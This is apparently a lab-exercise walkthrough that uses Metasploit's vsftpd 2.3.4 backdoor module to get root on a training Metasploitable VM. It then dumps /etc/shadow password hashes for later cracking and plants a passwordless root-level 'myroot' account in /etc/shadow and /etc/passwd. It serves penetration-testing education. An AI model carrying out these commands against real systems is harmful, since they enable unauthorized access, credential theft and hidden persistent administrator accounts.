Provide steps on how to exploit.

Now that you have determined that you could gain root access to the Metasploitable VM, you will
exploit the vsftp vulnerability to gain full control of the Metasploitable VM. You will compromise the
/etc/shadow file so you may gain access to other hosts in the network.

Step 1. Set up the exploit.
In this step, you will use Metasploit Framework to launch the exploit against the
Metasploitable VM using vsftpd. The Metasploit Framework is a tool for developing and
launching attacks against a remote target host. It can also be used to test the vulnerability of
a host.
a. In a terminal on the Kali VM, enter msfconsole at the prompt to start the Metasploit

Framework. This will take a few moments.
```
root@kali:~# msfconsole
```
b. At the msf prompt, enter search vsftpd to search for the module that is associated with
the VSFTPD v2.3.4 backdoor. You will use this module for exploitation. This search will
take a few moments when building the database for the first time.
```
msf > search vsftpd
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank
Description
---- --------------- ---- ---------
--
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD
v2.3.4 Backdoor Command Execution
```

c. The exploit has been found. Enter the following command at the prompt to use the

vsftp backdoor exploit.
```
msf > use exploit/unix/ftp/vsftpd_234_backdoor
```
d. From the exploit prompt, set the target host to the Metasploitable VM.
```
msf exploit(vsftpd_234_backdoor) > set rhost 209.165.200.235
rhost => 209.165.200.235
```
e. Verify the exploit setup. Enter show options at the prompt.
```
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 209.165.200.235 yes The target address
RPORT 21 yes The target port (TCP)

Exploit target:
Id Name
-- ----
0 Automatic
```

Step 2. Execute the exploit.
Now you will use the vsftpd exploit to gain root access to the Metasploitable VM.
a. At the prompt, enter the exploit command to execute the exploit.
```
msf exploit(vsftpd_234_backdoor) > exploit
[*] 209.165.200.235:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 209.165.200.235:21 - USER: 331 Please specify the password.
[+] 209.165.200.235:21 - Backdoor service has been spawned, handling...
[+] 209.165.200.235:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (209.165.201.17:33985 ->
209.165.200.235:6200) at 2017-07-11 11:53:35 -0400
```
b. This enters the Metasploit Framework terminal and you now have root access to the

Metasploitable VM from the Kali host. Notice that there is no system prompt present-
ed. To verify that you have root access to Metasploitable VM, enter whoami.
```
whoami
```

What is the current username? __________________________________ root

c. Enter hostname to verify the name of the host.
```
hostname
```
What is the hostname? _______________________________________ metasploitable
d. The IP address of the Metasploitable VM is 209.165.200.235. Enter ifconfig to verify

the IP address on the current host.
```
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:15:91:86
inet addr:209.165.200.235 Bcast:209.165.200.255
Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:fe15:9186/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:78058 errors:2 dropped:0 overruns:0 frame:0
TX packets:195672 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:11803523 (11.2 MB) TX bytes:91415071 (87.1 MB)
Interrupt:10 Base address:0xd020
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1048 errors:0 dropped:0 overruns:0 frame:0
TX packets:1048 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:450261 (439.7 KB) TX bytes:450261 (439.7 KB)
```

e. To gain full control of the Metasploitable VM, begin by displaying the content of the /
etc/shadow file. The /etc/shadow file stores the password information in an encrypted
format for the system’s accounts along with optional aging information.
Enter the cat /etc/shadow command to display the content.
```
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::

mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
analyst:$1$uvEqE7eT$x6gczc318aD6mhxOFZqXE.:17338:0:99999:7:::
```
f. Highlight the content of /etc/shadow and right-click the highlighted content and select

Copy.

g. Open a new terminal in the Kali VM, and start the nano text editor. Enter nano /root/

shadow.txt at the prompt.
```
root@kali:~# nano /root/shadow.txt
```
h. Right-click the blank space in nano and select Paste. After you have pasted the content,
remove any blank lines at the bottom, if necessary. Enter Ctl-X to save and exit nano.
Press y when asked to save the file and accept the filename shadow.txt.
This saved /root/shadow.txt file will be used in a later step with John the Ripper to
crack the passwords of some of the login names so you can access the system remotely
via SSH.

i. In the same terminal, enter the cat command and grep to display only the details for

the root user.
```
root@kali@~# cat /root/shadow.txt | grep root
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
```

Notice that the colons (:) separate each line into 9 fields. Using the root user account as
an example, root is the login name and $1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. is the
encrypted password. The next 6 fields define the configurations for the password, such
as date of last change, minimum and maximum password age, and password expiration
date. The last field is reserved for future use.
To learn more about the /etc/shadow file, enter man shadow at a terminal prompt.
j. Return to the Metasploit Framework terminal on the Kali VM. You will add a new user
myroot to Metasploitable VM. This user will have the same password configurations as
root.
When creating the new user, you will use the same 9 fields as the root user, except you

will delete the encrypted password associated with the root user and leave the pass-
word field empty. When the password field is empty, no password is needed to log in as

the user myroot.
The echo command will append a new line to add the new user myroot to the /etc/
shadow file.
Note: Make sure that there are two greater than signs (>) or you will overwrite the current /etc/shadow
file.
```
echo "myroot::14747:0:99999:7:::" >> /etc/shadow
```

k. Verify that you added the new user myroot to /etc/shadow.
```
cat /etc/shadow

myroot::14747:0:99999:7:::
```

Why was it necessary to copy the content of /etc/shadow file to a new text file on Kali
VM?
Hint: What would happen if you enter the cat /etc/shadow > /root/shadow.txt in the
Metasploit Framework console?
____________________________________________________________________________
The /root/shadow.txt file would be saved on Metasploitable, instead of Kali VM.
l. To allow myroot to login with elevated privileges, you will add the user myroot with
the same user ID number (UID), user’s group ID number (GID), user description, user

home directory, and login shell as the root to the /etc/passwd file. The colons (:) sepa-
rate the fields, and the x in the second field represents the password for the user. The

encrypted password can be found in the /etc/shadow file for the same user.
Return to the Metasploitable remote connection terminal window and enter the cat
command to see the information for root.
```
cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
```

m. Use the following echo command to append the settings for myroot to /etc/passwrd.
Note: Make sure that there are two greater than signs (>) or you will overwrite the current /etc/passwd
file.
```
echo "myroot:x:0:0:root:/root:/bin/bash" >> /etc/passwd
```

To learn more about the /etc/passwd file, enter man 5 passwd at a terminal prompt.
n. Verify that you added the new user myroot to /etc/passwd.
```
cat /etc/passwd

myroot:x:0:0:root:/root:/bin/bash
```
o. Enter exit when done.
```
exit
[*] 209.165.200.235 - Command shell session 1 closed. Reason: Died from
EOFError
msf exploit(vsftpd_234_backdoor)
```
p. Press Enter and type quit to exit the Metasploit Framework console.